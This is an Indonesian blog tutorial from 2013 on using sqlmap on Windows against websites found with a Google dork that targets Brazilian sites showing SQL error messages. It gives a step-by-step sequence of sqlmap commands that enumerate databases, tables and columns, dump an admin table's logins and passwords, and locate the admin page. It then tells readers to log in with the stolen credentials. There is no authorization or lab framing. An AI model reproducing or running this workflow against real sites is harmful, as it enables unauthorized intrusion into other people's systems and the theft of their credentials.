Kembali brsama saya admin dari blog goblok yang paling manis,kali ini saya akan berbagi sedikit cara scan website menggunakan sqlmap pada windows :D.Oke langsung saja simak.
Alat Dan Bahan :D
1.Python
2.Sqlmap
Download terlebih dahulu alat dan bahan di atas(seacrh di google banyak :D)
Step By Step
1. Cari Web yang vuln dengan dork yang ente punya,untuk contoh ane ane menggunakan dork "inurl:"id=" & intext:"You have an error in your SQL syntax " site:.br"
2. Masuk ke folder sqlmap melalui CMD,
cd Python27/sqlmap
itu merupakan tempat ane menyimpan file sqlmap nya
3. Scan salah satu web yang telah ente dapet dari dork pada nomor 1 dengan perintah
sqlmap.py -u http://website.com/pages.php?id=10 --dbs --random-agent --flush-session
*Ket :
-u : url address yang vulnerable
--dbs : mencari database dari target vuln
--random-agent : menggunakan user agent secara acak
--flush-session : menggunakan tehnik injeksi lain jika target ga vulnerable pake injeksi biasa
Jika berhasil maka akan keluar nama database nya
Database :
- zzzzzzzzzzzz
- information_schema
*zzzzzzzzzzzzzz = nama database nya
4. Stelah nama database ditemukan selanjutnya kita mencari table nya dengan cara
sqlmap.py -u http://ebsite.com/pages.php?id=10 -D zzzzzzzzz --tables --time-sec=5 --random-agent
**ket :
-D : menggunakan database yang ditemukan sebagai titik scanner
--tables : mencari data table yang ada pada database (-D)
--time-sec=5 : menentukan timing scanner dari sqlmap
Dan hasil nya akan tampak seperti dibawah ini
-------------------------------
-------------------------------
--- -abcdef---
--- - cdghtgu---
--- -ksojiji ---
--- -huhuhuh---
--- -admin---
-------------------------------
-------------------------------
itu merupakan nama-nama table nya
5. Selanjut nya kita akan mencari nama column nya pada salah satu table,biasa nya untuk user dan pass berada pada table admin,maka kita pilih table admin dengan perintah
sqlmap.py -u http://website.compages.php?id=10 -D zzzzzzzzzz -T admin --columns --random-agent
***Ket
-T =untuk memanggil table yang akan di scan
maka hasil nya seperti ini
Columns Found :
-------------------------------
-------------------------------
--- -login ---
--- -password ---
--- -id ---
--- -xxxxxxx ---
-------------------------------
-------------------------------
6.Setelah ketemu colum2 nya,sekarang kita dump deh :D dengan perintah
sqlmap.py -u http://website.com/pages.php?id=10 -D xxxxxxxx -T admin -C login,password --dump --random-agent --time-sec=5
login dan password= nama columns yang kita dump
dan hasil nya seperti ini
-------------------------------
login password
-------------------------------
admin 123456
-------------------------------
-------------------------------
nah setelah ketemu data untuk login sekarang waktu nya kita login :D
Seblum nya kita coba terlbeih dahulu mencari page admin nya dengan perintah
sqlmap.py -u http://website.com/pages.php?id=10 -D xxxxxxxx -T admin --search --random-agent
atau :
sqlmap.py -u http://website.com/pages.php?id=10 -D xxxxxxxx --search -C login --random-agent
**Ket :
--search : mencari sebuah data, antara table dan column (terserah
penempatan mau ditaruh diantara -T*tables* atau -C*columns*) karena
fungsi utama --search adalah mencari data tertentu dari tables atau
column
stelah ketemu,silahkan dan anda login :D
Oke cukup sekian postingan mengenai Tutorial Sql Map Dengan Python Pada Windows
Salam Hacking dari admin paling manis :D.Semoga bermanfaat
Tutorial Sql Map Dengan Python Pada Windows
Posted by CB Blogger
Blog, Updated at: 1/14/2013 01:22:00 PM
0 komentar:
Posting Komentar
Sebagai Pengunjung yang baik berikanlah komentar anda untuk membantu meningkatkan trafic blog ini.Terima Kasih :)